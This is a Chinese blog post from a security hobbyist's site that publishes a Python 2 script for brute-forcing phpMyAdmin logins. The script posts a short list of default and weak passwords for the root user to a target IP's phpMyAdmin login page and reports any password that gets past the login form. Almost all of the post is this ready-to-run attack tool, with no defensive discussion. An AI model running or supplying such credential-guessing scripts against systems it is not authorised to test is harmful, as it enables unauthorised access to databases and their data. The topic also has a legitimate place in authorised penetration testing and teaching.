PHPMyAdmin弱口令猜解【Python脚本】

PHPMyAdmin弱口令猜解

测试截图: 

代码片段

#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import requests
import time

username_list=['root']
password_list=['root','','admin','123456','password']

def phpMyAdmin(ip,port=80):
	for username in username_list:
		username =username.rstrip()
		for password in password_list:
			password = password.rstrip()
			try:
				#url = "http://192.168.106.141/phpmyadmin/index.php"
				url = "http://"+ip+":"+str(port)+"/phpmyadmin/index.php"

				data={'pma_username':username,'pma_password':password}
				response = requests.post(url,data=data,timeout=5)
				result=response.content
				if result.find('name="login_form"')==-1:
					print '===================================================='
					print '[+] find phpMyAdmin weak password:'+username,password
					print '===================================================='
					break
				else:
					print '[-] Checking for '+username,password+" fail"
			except:
				print '[-] Something Error'+username,password+" fail"
				
if __name__ == '__main__':
	phpMyAdmin("192.168.106.141")

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

  

posted @ 2016-12-07 11:01  Bypass  阅读(1351)  评论(0编辑  收藏  举报